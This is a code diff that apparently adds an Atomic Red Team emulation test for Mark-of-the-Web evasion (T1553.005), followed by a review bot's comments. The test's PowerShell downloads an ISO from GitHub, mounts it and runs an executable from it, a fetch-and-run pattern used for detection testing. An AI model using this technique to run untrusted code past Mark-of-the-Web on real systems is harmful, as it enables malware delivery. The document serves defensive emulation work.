diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
index 000674c5..63f1ffe5 100644
--- a/atomics/T1553.005/T1553.005.yaml
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 path_of_iso:
 description: Path to ISO file
 type: path
- default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso
+ default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
 dependency_executor_name: powershell
 dependencies:
 - description: |
@@ -20,11 +20,41 @@ atomic_tests:
 if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
 get_prereq_command: |
 New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}"
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
 executor:
 command: |
 Mount-DiskImage -ImagePath "#{path_of_iso}"
 cleanup_command: |
- Dismount-DiskImage -ImagePath "#{path_of_iso}"
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
 name: powershell
+- name: Mount an ISO image and run executable from the ISO
+ description: |-
+ Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO.
+ Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!".
+ ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+ prereq_command: |
+ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+ $driveLetter = ($keep | Get-Volume).DriveLetter
+ invoke-item "$($driveLetter):\hello.exe"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+ Stop-process -name "hello" -Force -ErrorAction ignore
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso
new file mode 100644
index 00000000..491da79f
Binary files /dev/null and b/atomics/T1553.005/bin/FeelTheBurn.iso differ
diff --git a/atomics/T1553.005/src/T1553.005.iso b/atomics/T1553.005/bin/T1553.005.iso
similarity index 100%
rename from atomics/T1553.005/src/T1553.005.iso
rename to atomics/T1553.005/bin/T1553.005.iso
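Review bot: In the new test's `cleanup_command`, `Dismount-DiskImage` runs before `Stop-process -name "hello"`, so the dismount is attempted while hello.exe, launched from that very volume, may still be running and holding the volume open; swapping the two lines so the process is stopped first, `Stop-process -name "hello" -Force -ErrorAction ignore` followed by `Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null`, makes the cleanup reliable. The executor also assumes `($keep | Get-Volume).DriveLetter` is non-empty; if the mount yields no drive letter, `invoke-item` is handed `":\hello.exe"`, so a guard such as `if (-not $driveLetter) { Write-Error "ISO mounted without a drive letter"; exit 1 }` between those two lines would surface the real failure instead of a confusing path error. Finally, `get_prereq_command` fetches the ISO from the master branch with no integrity check before it is mounted and its executable run; recording the expected hash alongside the test and comparing it with `Get-FileHash` after download would keep the test reproducible and detect an artifact that changes upstream.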